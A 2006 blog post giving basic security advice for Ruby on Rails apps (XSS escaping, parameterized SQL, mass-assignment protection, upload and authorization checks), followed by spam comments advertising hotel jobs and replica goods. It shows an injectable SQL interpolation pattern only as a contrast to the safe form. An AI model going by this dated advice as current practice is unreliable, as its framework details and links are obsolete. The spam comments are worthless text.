Smorgasbord - Politics, Lisp, Rails, Fencing, etc.

My musings on assortment of things ranging from politics, computer technology and programming to sports.

Wednesday, May 03, 2006


On this day:

Securing Rails application

Using Ruby on Rails has been fun. An important part of developing a web application is making sure that most of the security loopholes are plugged in. Here are few basic things which should be checked and fixed in any security audit:


  • User trying to execute javascript or inserting html statement, or Cross-Site Scripting (CSS/XSS).
    http://manuals.rubyonrails.com/read/chapter/44 provides a tutorial in this, but the basic idea is that use HTML-escaping function `h' or `sanitize' while displaying all data input by the user. Even the XML/RSS data which is displayed should be secured. Sanitize is generally safe but there may still be some hidden security flaws.

  • SQL Injection or user maliciously inserting sql statements in you queries.
    http://manuals.rubyonrails.com/read/chapter/43
    has again a tutorial chapter on this. The key point is not using sql directly, but in some cases where you need to then instead of embedding user input in sql by using
    " ..subject = #{param[:subject]} ..."

    use
    " ..subject = ? ...", param[:subject]

    Also, turn off the echo service on production web server.
    Rails makes it so easy to avoid common SQL injection attack, whereas I remember working in a corporate environment and using PHP, and in all most all sql statements in the code, it was possible to do SQL injection attack.

  • Creating records directly from form parameters.
    Another chapter http://manuals.rubyonrails.com/read/chapter/47 giving tutorial details. The key point is that to prevent some model fields being updated by the form parameters directly (or en masse), use `attr_protected' or the more secure `attr_accessible'.

  • Not exposing controller methods.
    Make controller methods which should not be accessible to the user as `private' or `protected'.

  • Checking file/attachment uploads.
    It is generally safer to store the files in the database. Check the size of the file being uploaded, and make sure that it doesn't exceeds the permissible limit. Also, check the file extension, and make sure that it is a valid extension and not `*.cgi', `*.php', `*.js' etc.

  • Be careful about ID parameters.
    For certain operations, for example say displaying email, a user should be only able to read his or her email. In this case, in the email displaying controller, a check should be made to verify that the user is authorized to read the email.

Remember a chain is as strong as the weakest link in it.

4 Comments:

At Tue Sep 01, 01:04:00 PM 2009, Anonymous Anonymous said...

酒店打工

酒店兼職

台北酒店

打工兼差

酒店工作

酒店經紀

禮服店

酒店兼差

酒店上班

酒店PT

酒店正職

酒店賺錢

酒店日領

 
At Fri Jul 08, 05:20:00 PM 2016, Blogger ninest123 said...

air max, sac longchamp, ray ban sunglasses, longchamp pas cher, ugg boots, ray ban sunglasses, nike free, oakley sunglasses, nike free, chanel handbags, cheap oakley sunglasses, nike outlet, louboutin, longchamp, nike roshe run, air jordan pas cher, tiffany jewelry, longchamp outlet, longchamp outlet, michael kors, prada outlet, louis vuitton outlet, louboutin outlet, louis vuitton, uggs on sale, ugg boots, louis vuitton, polo ralph lauren outlet, oakley sunglasses, louis vuitton, kate spade outlet, louboutin pas cher, polo ralph lauren outlet, tory burch outlet, tiffany and co, oakley sunglasses, ray ban sunglasses, ralph lauren pas cher, christian louboutin outlet, nike air max, nike air max, louboutin shoes, replica watches, jordan shoes, oakley sunglasses, gucci outlet, prada handbags, burberry, replica watches, louis vuitton outlet

 
At Fri Jul 08, 05:24:00 PM 2016, Blogger ninest123 said...

ray ban uk, vanessa bruno, sac guess, air force, tn pas cher, coach outlet, michael kors, burberry outlet online, nike blazer, lululemon, vans pas cher, mulberry, michael kors, burberry, nike free run uk, nike roshe, ray ban pas cher, michael kors outlet, hollister pas cher, hollister, north face, hermes, new balance pas cher, coach purses, true religion outlet, nike air max, replica handbags, ugg boots, michael kors outlet, hogan, nike air max, true religion jeans, abercrombie and fitch, kate spade handbags, lacoste pas cher, true religion jeans, michael kors outlet, converse pas cher, coach outlet, timberland, nike air max, michael kors, ugg boots, michael kors outlet, true religion jeans, north face, michael kors, ralph lauren uk, oakley pas cher, michael kors outlet

 
At Fri Jul 08, 05:55:00 PM 2016, Blogger ninest123 said...

bottes ugg, ugg pas cher, louis vuitton, pandora jewelry, moncler, moncler, doudoune canada goose, replica watches, louis vuitton, moncler, juicy couture outlet, moncler, juicy couture outlet, ugg,uggs,uggs canada, canada goose, ugg,ugg australia,ugg italia, pandora charms, canada goose, links of london, canada goose outlet, pandora charms, canada goose uk, canada goose, marc jacobs, moncler, wedding dresses, louis vuitton, canada goose outlet, karen millen, louis vuitton, moncler outlet, sac louis vuitton pas cher, coach outlet, moncler, swarovski, ugg boots uk, toms shoes, moncler, pandora jewelry, canada goose, montre pas cher, thomas sabo, supra shoes, hollister, swarovski crystal

 

Post a Comment

Links to this post:

Create a Link

<< Home